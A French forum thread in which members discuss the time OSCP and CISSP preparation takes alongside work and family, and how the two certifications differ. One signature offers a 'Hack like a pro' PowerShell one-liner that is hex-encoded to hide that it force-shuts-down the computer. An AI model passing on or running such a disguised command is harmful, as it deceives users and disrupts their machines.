Annonce

Rduire
Aucune annonce.

Recherche infos sur certification OSCP

Rduire
X

• Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

• Recherche infos sur certification OSCP

Bonjour tous,

Je m'adresse ceux qui ont dj le courage de passer la certification OSCP.

Je suis dj dans l'informatique depuis plus de 15 ans (professionnellement, j'entends). J'ai fait beaucoup de choses : dveloppement, conception, R&D, gestion de projet, etc. Mais il y a toujours un domaine qui m'a attir, celui du hacking et l'intrusion de systme. Je cherche voluer dans ce domaine tout en restant en activit. J'ai regard les formations disponibles sur le march et les deux formations qui semblent sortir du lot sont OSCP et CISPP mais elles semblent tre trs consommatrices de temps.

Ma question est donc simple. Pouvez-vous me dire d'aprs vos expriences si le passage de ces certification est compatible avec le boulot et une vie de famille :-) ? Combien de temps faut-il se rserver pour esprer russir ?

Merci d'avance tous pour vos retours

BenGee

Envoy par BenGee Voir le message
    Combien de temps faut-il se rserver pour esprer russir ?
    Je crois que tu trouvera des rponses en lisant l ==> https://hackademics.fr/forum/orienta...d-professional
    <?php
    $signature = NULL;
    ?>

Commentaire

Mahi2 J'ai dj lu ce thread. Si j'y avais trouv la rponse, je n'aurais pas pos la question dans un post spar. D'ailleurs, le dernier post mis sur le thread indiqu est le mien. Ma question va plus loin. Elle concerne le temps et l'investissement requis lorsque l'on doit bosser en mme temps et aussi s'occuper de sa famille.

Commentaire

Dommage qu'il n'y ai pas de rponse concrte mais je pense que a demande des sacrifices niveau vie de famille surtout mais bon c'est temporaire au max a te prends 90j tre fond le soir et les weekends, si c'est ton objectif alors ta famille comprendra le jeu en vaut la chandelle

Commentaire

Hello,

OSCP et CISSP sont des certifs trs diffrentes :

OSCP est exclusivement technique et oriente Pentest (Enum -> recherche de vuln -> exploitation -> rapport).
          Le job vis avec cette certif, c'est clairement Pentester (Et c'est certainement la certif la plus recherche pour ce job d'ailleurs).
          Cot investissement : Tout dpend de quel niveau tu pars, mais 3 mois de labs ne sont pas de trop, raison de 2h / jours, et un peu plus le week end. Clairement, a va te rajouter +- 20h de taff par semaines pendant 3 mois, ce qui n'est pas ngligeable : parle en ta femme AVANT

CISSP est une certif bien plus oriente archi / Orga (et finalement assez peu technique), elle est trs demande pour un profile de type RSSI orient technique. Elle sert un peu de pont entre le monde pur technique, et le monde pur orga (ISO 27001, COBIT, ITIL, ...)
          Si elle demande de l'investissement, ce n'est en rien comparable avec l'OSCP. (pas vraiment d'chelle d temps donner, mais l'exam c'est un QCM qui porte sur 8 domaines bien distincts, disons que je champ de rvision est LARGE, mais a reste un QCM...) (Faut aussi prendre en compte que c'est une certif qui doit se maintenir activement sur la dure en justifiant de suivi de formations / participation des vnements / publication d'articles, ... )

Choisir entre ces deux certifs revient donc choisir entre deux projets professionnels.

./Kriss
          Dernire modification par Krisscool, 28 avril 2017, 14h18.
          Hack like a pro :
          PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

Commentaire

Chargement...
          X